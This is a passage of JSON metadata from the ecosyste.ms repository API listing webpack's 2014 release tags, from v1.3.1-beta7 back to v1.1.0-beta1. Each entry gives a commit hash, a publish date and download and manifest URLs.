pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_